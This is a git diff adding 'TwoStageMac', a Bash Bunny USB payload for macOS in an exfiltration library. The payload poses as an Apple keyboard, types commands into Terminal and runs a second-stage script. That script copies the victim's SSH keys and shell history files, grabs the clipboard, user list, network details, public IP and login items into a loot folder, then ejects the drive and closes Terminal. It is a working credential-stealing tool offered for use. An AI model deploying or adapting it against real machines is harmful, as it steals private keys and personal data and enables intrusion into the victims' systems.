diff --git a/payloads/library/exfiltration/TwoStageMac/README.md b/payloads/library/exfiltration/TwoStageMac/README.md new file mode 100644 index 00000000..fc0d6315 --- /dev/null +++ b/payloads/library/exfiltration/TwoStageMac/README.md @@ -0,0 +1,9 @@ +# Two Stage Mac + +Author: Draxiom + +## Description +A simple two stage payload for OSX. First stage, opens terminal and executes a shell script, saved on the Bash Bunny's storage. Sample second stage does some device profiling. + +## Usage +Overwrite second-stage.sh with custom script and plug into mac. It should open up terminal and execute the second stage via `sh /Volumes/BashBunny/switch#/second-stage.sh`. Loot is saved in /Volumes/BashBunny/loot/hostname/epoch/ and is passed into second-stage.sh as the parameter `$1` \ No newline at end of file diff --git a/payloads/library/exfiltration/TwoStageMac/payload.txt b/payloads/library/exfiltration/TwoStageMac/payload.txt new file mode 100644 index 00000000..c6fb45c5 --- /dev/null +++ b/payloads/library/exfiltration/TwoStageMac/payload.txt @@ -0,0 +1,42 @@ +# Title: TwoStageMac +# Description: A simple two stage payload for OSX. Sample second stage +# does some device profiling. +# Author: Draxiom +# Props: jdetmold +# Version: 1.0 +# Category: Exfiltration +# Target: OSX +# Attack Modes: HID, STORAGE + +LED SETUP +ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE +GET SWITCH_POSITION + +# Global variables +MOUNTING_LOCATION=/Volumes/BashBunny +SECOND_STAGE=${MOUNTING_LOCATION}/payloads/${SWITCH_POSITION}/second-stage.sh +LOOT_DIR=${MOUNTING_LOCATION}/loot/$\(hostname\) + +# Open terminal +LED ATTACK +RUN OSX terminal +Q ENTER +Q DELAY 200 +# Open new window in case there's already a terminal window open +Q GUI n +Q DELAY 100 + +# Set up loot directory and pipe output to text file (named by epoch time) +Q STRING NOW=$\(date +'%s'\)\; mkdir -p $LOOT_DIR/\$NOW\; sh $SECOND_STAGE ${LOOT_DIR}/\$NOW \> $LOOT_DIR/\$NOW/STDOUT.txt 2\> $LOOT_DIR/\$NOW/STDERR.txt +Q ENTER + +# Eject +LED CLEANUP +Q STRING diskutil eject ${MOUNTING_LOCATION} +Q ENTER +Q STRING killall Terminal +Q ENTER + +sync + +LED FINISH diff --git a/payloads/library/exfiltration/TwoStageMac/second-stage.sh b/payloads/library/exfiltration/TwoStageMac/second-stage.sh new file mode 100644 index 00000000..09173737 --- /dev/null +++ b/payloads/library/exfiltration/TwoStageMac/second-stage.sh @@ -0,0 +1,61 @@ +#!/bin/bash +# +# This is a sample second-stage script. It will scrape some interesting +# information from a mac. The target loot directory is passed in as $1 +# I have added echo statements for each command to make it easier to parse +# STDOUT when viewing loot afterwards. + +echo "$ whoami" +whoami + +echo "$ uname -a" +uname -a + +echo "$ df -h" +df -h + +echo "$ ls ~" +ls -alF ~ + +echo "$ cd ${1}" +cd $1 + +echo "$ cp -r ~/.ssh ssh" +cp -r ~/.ssh $1/ssh + +echo "$ cp -r ~/.bash* ." +cp -r ~/.bash* $1/. + +echo "for file in .*; do" +for file in .*; do + # Skip "." and ".." and unhide every hidden file + if [[ "${file}" =~ ^\.*$ ]]; then + echo "Skip \"${file}\"" + else + echo "mv ${file} ${file#.}" + mv "$file" "${file#.}" + fi +done +echo "done" + +# Lifted from library/recon/MacProfiler +echo "$ history" +history + +echo "$ osascript -e \"the clipboard\" > clipboard.txt" +osascript -e "the clipboard" > clipboard.txt + +echo "$ dscl . list /Users | grep -v '_'" +dscl . list /Users | grep -v '_' + +echo "$ ifconfig" +ifconfig + +echo "$ curl ipecho.net/plain" +curl ipecho.net/plain + +echo "$ osascript -e 'tell application \"System Events\" to get the name of every login item'" +osascript -e 'tell application "System Events" to get the name of every login item' + +echo "$ ls /Applications/" +ls /Applications/